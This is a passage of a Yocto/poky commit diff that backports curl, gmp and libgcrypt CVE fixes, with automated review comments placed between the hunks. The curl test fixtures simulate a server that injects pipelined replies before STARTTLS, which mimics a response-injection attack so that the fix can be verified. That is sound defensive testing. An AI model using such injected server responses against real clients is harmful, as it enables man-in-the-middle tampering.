b/tests/data/test982 +@@ -0,0 +1,57 @@ ++<testcase> ++<info> ++<keywords> ++POP3 ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++CAPA STLS USER ++REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated ++REPLY PASS -ERR Authentication credentials invalid ++</servercmd> ++<data nocheck="yes"> ++From: me@somewhere ++To: fake@nowhere ++ ++body ++ ++-- ++ yours sincerely ++</data> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++pop3 ++</server> ++ <name> ++POP3 STARTTLS pipelined server response ++ </name> ++ <command> ++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER 
-u user:secret --ssl ++ </command> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++CAPA ++STLS ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test983 b/tests/data/test983 +new file mode 100644 +index 0000000..300ec45 +--- /dev/null ++++ b/tests/data/test983 +@@ -0,0 +1,52 @@ ++<testcase> ++<info> ++<keywords> ++FTP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete ++REPLY PASS 530 Login incorrect ++</servercmd> ++</reply> ++ ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++ftp ++</server> ++ <name> ++FTP STARTTLS pipelined server response ++ </name> ++<file name="log/test%TESTNUMBER.txt"> ++data ++ to ++ see ++that FTPS ++works ++ so does it? ++</file> ++ <command> ++--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP ++</command> ++</client> ++ ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++AUTH SSL ++</protocol> ++</verify> ++</testcase> diff --git a/poky/meta/recipes-support/curl/curl_7.69.1.bb b/poky/meta/recipes-support/curl/curl_7.69.1.bb index 21c673feda..bc1b993e9e 100644 --- a/poky/meta/recipes-support/curl/curl_7.69.1.bb +++ b/poky/meta/recipes-support/curl/curl_7.69.1.bb @@ -22,6 +22,9 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \ file://CVE-2021-22898.patch \ file://CVE-2021-22924.patch \ file://CVE-2021-22925.patch \ + file://CVE-2021-22946-pre1.patch \ + file://CVE-2021-22946.patch \ + file://CVE-2021-22947.patch \ " SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42" 
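Review bot: The four new pipelining checks (FTP_AUTH in lib/ftp.c and the STARTTLS response handlers in lib/imap.c, lib/pop3.c and lib/smtp.c) return CURLE_WEIRD_SERVER_REPLY without calling failf(), so a rejected STARTTLS response leaves only a generic error code. Leftover bytes in the pingpong cache at this point mean data arrived ahead of the TLS handshake, which is worth surfacing. A message such as `failf(data, "STARTTLS response pipelining rejected");` before each return would make the event visible in logs; the `if` body then needs braces. The imap, pop3 and smtp checks also reach the cache through `data->conn->proto.…pp.cache_size` although `conn` is already a parameter of those functions per the hunk headers. Using `conn->proto.imapc.pp.cache_size` (and the pop3c/smtpc equivalents) would match the surrounding code, assuming `data->conn` and `conn` are the same connection here.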
@@ -29,7 +32,12 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5 # Curl has used many names over the years... CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl" -CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926" +CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-22945" + +# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897 +# and https://ubuntu.com/security/CVE-2021-22897 +# This CVE issue affects Windows only Hence whitelisting this CVE +CVE_CHECK_WHITELIST += "CVE-2021-22897" inherit autotools pkgconfig binconfig multilib_header diff --git a/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb index 1623285fd0..ea34e4c7a3 100644 --- a/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb +++ b/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb @@ -8,7 +8,7 @@ SECTION = "support" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32" -SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix" +SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))" SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197" diff --git a/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch new file mode 100644 index 0000000000..095fb21eaa --- /dev/null +++ b/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch 
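Review bot: The last entry added to `CVE_CHECK_WHITELIST` is `CVE-22945`, which has no year field and so cannot match a CVE identifier. The neighbouring entries suggest `CVE-2021-22945` was meant, but that should be confirmed against the advisory rather than assumed. As written, the check will presumably keep reporting whichever CVE this entry was supposed to exclude. The entry also lacks the kind of justification given for CVE-2021-22897 just below it; a comment stating why the issue does not apply to this curl version, with a reference, would make the exclusion auditable.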
@@ -0,0 +1,27 @@ +CVE: CVE-2021-43618 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +# HG changeset patch +# User Marco Bodrato <bodrato@mail.dm.unipi.it> +# Date 1634836009 -7200 +# Node ID 561a9c25298e17bb01896801ff353546c6923dbd +# Parent e1fd9db13b475209a864577237ea4b9105b3e96e +mpz/inp_raw.c: Avoid bit size overflows + +diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c +--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100 ++++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200 +@@ -88,8 +88,11 @@ + + abs_csize = ABS (csize); + ++ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8)) ++ return 0; /* Bit size overflows */ ++ + /* round up to a multiple of limbs */ +- abs_xsize = BITS_TO_LIMBS (abs_csize*8); ++ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8); + + if (abs_xsize != 0) + { diff --git a/poky/meta/recipes-support/gmp/gmp_6.2.0.bb b/poky/meta/recipes-support/gmp/gmp_6.2.0.bb index a19c74fca8..d29b74f829 100644 --- a/poky/meta/recipes-support/gmp/gmp_6.2.0.bb +++ b/poky/meta/recipes-support/gmp/gmp_6.2.0.bb @@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \ file://use-includedir.patch \ file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \ file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \ + file://cve-2021-43618.patch \ " SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21" SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea" diff --git a/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb index e5c69c0c46..19f32e8d1f 100644 --- a/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb +++ b/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb 
@@ -9,7 +9,7 @@ LICENSE = "LGPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \ file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4" -SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http" +SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master" SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48" DEPENDS = "glib-2.0" diff --git a/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch index 2c204e0245..a0af2d48dc 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch @@ -1,4 +1,4 @@ -From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001 +From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin <alex.kanavin@gmail.com> Date: Mon, 22 Jan 2018 18:00:21 +0200 Subject: [PATCH] configure.ac: use a custom value for the location of @@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac -index 919ab31..cd58fdb 100644 +index 64cb8c6..3fe9027 100644 --- a/configure.ac +++ b/configure.ac -@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf", +@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf", AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool]) diff --git a/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch index 3e798efd06..a13b4d5fb5 100644 
--- a/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch @@ -1,7 +1,7 @@ -From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001 +From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001 From: Saul Wold <sgw@linux.intel.com> Date: Wed, 16 Aug 2017 11:18:01 +0800 -Subject: [PATCH 3/4] dirmngr uses libgpg error +Subject: [PATCH] dirmngr uses libgpg error Upstream-Status: Pending Signed-off-by: Saul Wold <sgw@linux.intel.com> @@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com> Rebase to 2.1.23 Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> + --- - dirmngr/Makefile.am | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) + dirmngr/Makefile.am | 1 + + 1 file changed, 1 insertion(+) diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am -index b404165..d3f916e 100644 +index 00d3c42..450d873 100644 --- a/dirmngr/Makefile.am +++ b/dirmngr/Makefile.am -@@ -82,7 +82,8 @@ endif - dirmngr_LDADD = $(libcommonpth) \ +@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \ $(DNSLIBS) $(LIBASSUAN_LIBS) \ $(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \ -- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) -+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \ -+ $(GPG_ERROR_LIBS) + $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \ ++ $(GPG_ERROR_LIBS) \ + $(dirmngr_robj) if USE_LDAP dirmngr_LDADD += $(ldaplibs) - endif --- -1.8.3.1 - diff --git a/poky/meta/recipes-support/gnupg/gnupg/relocate.patch b/poky/meta/recipes-support/gnupg/gnupg/relocate.patch index e5a82aa76d..7f7812cd46 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/relocate.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/relocate.patch @@ -1,4 +1,4 @@ -From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001 +From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001 
From: Ross Burton <ross.burton@intel.com> Date: Wed, 19 Sep 2018 14:44:40 +0100 Subject: [PATCH] Allow the environment to override where gnupg looks for its @@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com> 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/common/homedir.c b/common/homedir.c -index e9e75d0..19140aa 100644 +index 4b6e46e..58989b4 100644 --- a/common/homedir.c +++ b/common/homedir.c -@@ -760,7 +760,7 @@ gnupg_socketdir (void) +@@ -763,7 +763,7 @@ gnupg_socketdir (void) if (!name) { unsigned int dummy; @@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644 } return name; -@@ -786,7 +786,7 @@ gnupg_sysconfdir (void) +@@ -789,7 +789,7 @@ gnupg_sysconfdir (void) } return name; #else /*!HAVE_W32_SYSTEM*/ @@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -815,7 +815,7 @@ gnupg_bindir (void) +@@ -818,7 +818,7 @@ gnupg_bindir (void) else return rdir; #else /*!HAVE_W32_SYSTEM*/ @@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -828,7 +828,7 @@ gnupg_libexecdir (void) +@@ -831,7 +831,7 @@ gnupg_libexecdir (void) #ifdef HAVE_W32_SYSTEM return gnupg_bindir (); #else /*!HAVE_W32_SYSTEM*/ @@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -842,7 +842,7 @@ gnupg_libdir (void) +@@ -845,7 +845,7 @@ gnupg_libdir (void) name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -856,7 +856,7 @@ gnupg_datadir (void) +@@ -859,7 +859,7 @@ gnupg_datadir (void) name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -872,7 +872,7 @@ gnupg_localedir (void) +@@ -875,7 +875,7 @@ gnupg_localedir (void) NULL); return name; #else /*!HAVE_W32_SYSTEM*/ 
@@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -940,7 +940,7 @@ gnupg_cachedir (void) +@@ -943,7 +943,7 @@ gnupg_cachedir (void) } return dir; #else /*!HAVE_W32_SYSTEM*/ diff --git a/poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb index 6629fc8556..18bb855769 100644 --- a/poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb +++ b/poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb @@ -25,14 +25,14 @@ SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for- file://relocate.patch" SRC_URI_append_class-nativesdk = " file://relocate.patch" -SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1" -SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30" +SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399" EXTRA_OECONF = "--disable-ldap \ --disable-ccid-driver \ --with-zlib=${STAGING_LIBDIR}/.. \ --with-bzip2=${STAGING_LIBDIR}/.. \ --with-readline=${STAGING_LIBDIR}/.. \ + --with-mailprog=${sbindir}/sendmail \ --enable-gpg-is-gpg2 \ " diff --git a/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch new file mode 100644 index 0000000000..1c46684c6d --- /dev/null +++ b/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch 
@@ -0,0 +1,24 @@ +From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Thu, 15 Jul 2021 12:33:13 -0700 +Subject: [PATCH] use closefrom() on linux and glibc 2.34+ + +Upstream-Status: Pending +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + src/posix-io.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/posix-io.c b/src/posix-io.c +index e712ef2..ab8ded9 100644 +--- a/src/posix-io.c ++++ b/src/posix-io.c +@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags, + if (fd_list[i].fd > fd) + fd = fd_list[i].fd; + fd++; +-#if defined(__sun) || defined(__FreeBSD__) ++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34)) + closefrom (fd); + max_fds = fd; + #else /*!__sun */ diff --git a/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb index 6e945d3165..dacc9896e4 100644 --- a/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb +++ b/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb @@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \ file://0006-fix-build-path-issue.patch \ file://0007-python-Add-variables-to-tests.patch \ file://0008-do-not-auto-check-var-PYTHON.patch \ - " + file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \ + " SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645" SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46" diff --git a/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch new file mode 100644 index 0000000000..bf26486d8b --- /dev/null +++ b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch 
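Review bot: The rewritten preprocessor condition in the posix-io.c hunk tests `__GNUC_PREREQ(2, 34)`, which compares the compiler version rather than the C library version. It is therefore true for any recent GCC, and `closefrom()` would be selected on glibc releases older than 2.34 that may not provide it. The subject line says "glibc 2.34+", so the intended macro is presumably `__GLIBC_PREREQ`: `#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GLIBC_PREREQ(2, 34))`. This branch decides how descriptors from `fd` upward are closed, so it is worth confirming on a target with an older glibc that the build still takes the fallback branch. _gpgme_io_spawn starts and ends outside the hunk.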
@@ -0,0 +1,77 @@ +From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001 +From: NIIBE Yutaka <gniibe@fsij.org> +Date: Tue, 13 Apr 2021 10:00:00 +0900 +Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding + too. + +* cipher/elgamal.c (do_encrypt): Also do exponent blinding. + +-- + +Base blinding had been introduced with USE_BLINDING. This patch add +exponent blinding as well to mitigate side-channel attack on mpi_powm. + +GnuPG-bug-id: 5328 +Signed-off-by: NIIBE Yutaka <gniibe@fsij.org> + +Upstream-Status: Backport +CVE: CVE-2021-33560 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + cipher/elgamal.c | 20 +++++++++++++++++--- + 1 file changed, 17 insertions(+), 3 deletions(-) + +diff --git a/cipher/elgamal.c b/cipher/elgamal.c +index 4eb52d62..9835122f 100644 +--- a/cipher/elgamal.c ++++ b/cipher/elgamal.c +@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey ) + static void + decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey ) + { +- gcry_mpi_t t1, t2, r; ++ gcry_mpi_t t1, t2, r, r1, h; + unsigned int nbits = mpi_get_nbits (skey->p); ++ gcry_mpi_t x_blind; + + mpi_normalize (a); + mpi_normalize (b); +@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey ) + + t2 = mpi_snew (nbits); + r = mpi_new (nbits); ++ r1 = mpi_new (nbits); ++ h = mpi_new (nbits); ++ x_blind = mpi_snew (nbits); + + /* We need a random number of about the prime size. The random + number merely needs to be unpredictable; thus we use level 0. 
*/ + _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM); + ++ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */ ++ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM); ++ mpi_set_highbit (r1, nbits - 1); ++ mpi_sub_ui (h, skey->p, 1); ++ mpi_mul (x_blind, h, r1); ++ mpi_add (x_blind, skey->x, x_blind); ++ + /* t1 = r^x mod p */ +- mpi_powm (t1, r, skey->x, skey->p); ++ mpi_powm (t1, r, x_blind, skey->p); + /* t2 = (a * r)^-x mod p */ + mpi_mulm (t2, a, r, skey->p); +- mpi_powm (t2, t2, skey->x, skey->p); ++ mpi_powm (t2, t2, x_blind, skey->p); + mpi_invm (t2, t2, skey->p); + /* t1 = (t1 * t2) mod p*/ + mpi_mulm (t1, t1, t2, skey->p); + ++ mpi_free (x_blind); ++ mpi_free (h); ++ mpi_free (r1); + mpi_free (r); + mpi_free (t2); + +-- +2.11.0 + diff --git a/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch new file mode 100644 index 0000000000..b3a18bc5aa --- /dev/null +++ b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch 
@@ -0,0 +1,109 @@ +From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001 +From: NIIBE Yutaka <gniibe@fsij.org> +Date: Fri, 21 May 2021 11:15:07 +0900 +Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations. + +* cipher/elgamal.c (gen_k): Remove support of smaller K. +(do_encrypt): Never use smaller K. +(sign): Folllow the change of gen_k. + +-- + +Cherry-pick master commit of: + 632d80ef30e13de6926d503aa697f92b5dbfbc5e + +This change basically reverts encryption changes in two commits: + + 74386120dad6b3da62db37f7044267c8ef34689b + 78531373a342aeb847950f404343a05e36022065 + +Use of smaller K for ephemeral key in ElGamal encryption is only good, +when we can guarantee that recipient's key is generated by our +implementation (or compatible). + +For detail, please see: + + Luca De Feo, Bertram Poettering, Alessandro Sorniotti, + "On the (in)security of ElGamal in OpenPGP"; + in the proceedings of CCS'2021. + +CVE-id: CVE-2021-33560 +GnuPG-bug-id: 5328 +Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti +Signed-off-by: NIIBE Yutaka <gniibe@fsij.org> + +Upstream-Status: Backport +CVE: CVE-2021-40528 +Signed-off-by: Armin Kuster <akuster@mvista.com> +--- + cipher/elgamal.c | 24 ++++++------------------ + 1 file changed, 6 insertions(+), 18 deletions(-) + +diff --git a/cipher/elgamal.c b/cipher/elgamal.c +index 4eb52d62..ae7a631e 100644 +--- a/cipher/elgamal.c ++++ b/cipher/elgamal.c +@@ -66,7 +66,7 @@ static const char *elg_names[] = + + + static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie); +-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k); ++static gcry_mpi_t gen_k (gcry_mpi_t p); + static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits, + gcry_mpi_t **factors); + static int check_secret_key (ELG_secret_key *sk); +@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie ) + + /**************** + * Generate a random secret exponent k from prime p, so 
that k is +- * relatively prime to p-1. With SMALL_K set, k will be selected for +- * better encryption performance - this must never be used signing! ++ * relatively prime to p-1. + */ + static gcry_mpi_t +-gen_k( gcry_mpi_t p, int small_k ) ++gen_k( gcry_mpi_t p ) + { + gcry_mpi_t k = mpi_alloc_secure( 0 ); + gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) ); +@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k ) + unsigned int nbits, nbytes; + char *rndbuf = NULL; + +- if (small_k) +- { +- /* Using a k much lesser than p is sufficient for encryption and +- * it greatly improves the encryption performance. We use +- * Wiener's table and add a large safety margin. */ +- nbits = wiener_map( orig_nbits ) * 3 / 2; +- if( nbits >= orig_nbits ) +- BUG(); +- } +- else +- nbits = orig_nbits; +- ++ nbits = orig_nbits; + + nbytes = (nbits+7)/8; + if( DBG_CIPHER ) +@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey ) + * error code. + */ + +- k = gen_k( pkey->p, 1 ); ++ k = gen_k( pkey->p ); + mpi_powm (a, pkey->g, k, pkey->p); + + /* b = (y^k * input) mod p +@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey ) + * + */ + mpi_sub_ui(p_1, p_1, 1); +- k = gen_k( skey->p, 0 /* no small K ! */ ); ++ k = gen_k( skey->p ); + mpi_powm( a, skey->g, k, skey->p ); + mpi_mul(t, skey->x, a ); + mpi_subm(t, input, t, p_1 ); +-- +2.30.2 + diff --git a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb index 16a58ad9b8..8045bab9ed 100644 --- a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb +++ b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb 
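Review bot: This patch header names two different CVEs and does not explain the difference: the upstream message carries `CVE-id: CVE-2021-33560`, while the Yocto tag is `CVE: CVE-2021-40528`. A single sentence above the `CVE:` tag, saying that upstream filed the commit under the first id and that the removal of the small K in `do_encrypt` is what the second id tracks, would keep CVE bookkeeping unambiguous; confirm that mapping against the advisory first. Separately, this patch and CVE-2021-33560.patch were both generated against the same `cipher/elgamal.c` blob (`index 4eb52d62..` in each), yet the recipe applies the other one first. The `sign` hunk here (`@@ -594,7 +582,7 @@`) sits below the lines that patch adds to `decrypt`, so it should only apply at an offset of about 14 lines, and refreshing this patch on top of the first would make the series apply exactly.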
@@ -28,6 +28,8 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \ file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \ file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \ file://determinism.patch \ + file://CVE-2021-33560.patch \ + file://CVE-2021-40528.patch \ " SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743" SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3" diff --git a/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb index 710ef0172d..841edc6829 100644 --- a/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb +++ b/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \ file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \ file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \ " -SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \ +SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \ file://0001-Makefile-cleanup-install-for-rebuilds.patch \ file://0001-Make-man-pages-reproducible.patch" SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba" diff --git a/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb b/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb index fa8655e027..f2c36944d8 100644 --- a/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb +++ b/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb @@ -10,7 +10,7 @@ SECTION = "devel" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37" -SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \ +SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \ file://pcre-cross.patch \ " 
